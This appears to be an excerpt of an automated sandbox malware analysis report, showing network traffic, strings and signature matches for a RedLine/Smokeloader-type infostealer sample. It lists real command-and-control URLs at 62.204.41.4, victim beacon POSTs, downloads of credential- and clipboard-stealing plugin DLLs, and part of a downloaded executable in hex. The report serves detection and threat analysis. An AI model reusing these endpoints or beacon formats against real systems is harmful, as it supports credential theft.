                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 22:07:01 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                              Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllZkoL
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php$
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php(
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php3#
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php5C
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php79e5342a2
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php=
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpC#
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpEC:L
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpEE
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpI#
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpUC
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpYR
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpeC
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpft
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpsoft
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpx
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_012086E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_012086E2
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 22:07:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              barindex
                              Source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.292530050.00000000006F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D3BA20_2_003D3BA2
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D5C9E0_2_003D5C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F33BA21_2_00F33BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F35C9E1_2_00F35C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00408C602_2_00408C60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040DC112_2_0040DC11
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00407C3F2_2_00407C3F
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00418CCC2_2_00418CCC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00406CA02_2_00406CA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004028B02_2_004028B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004182442_2_00418244
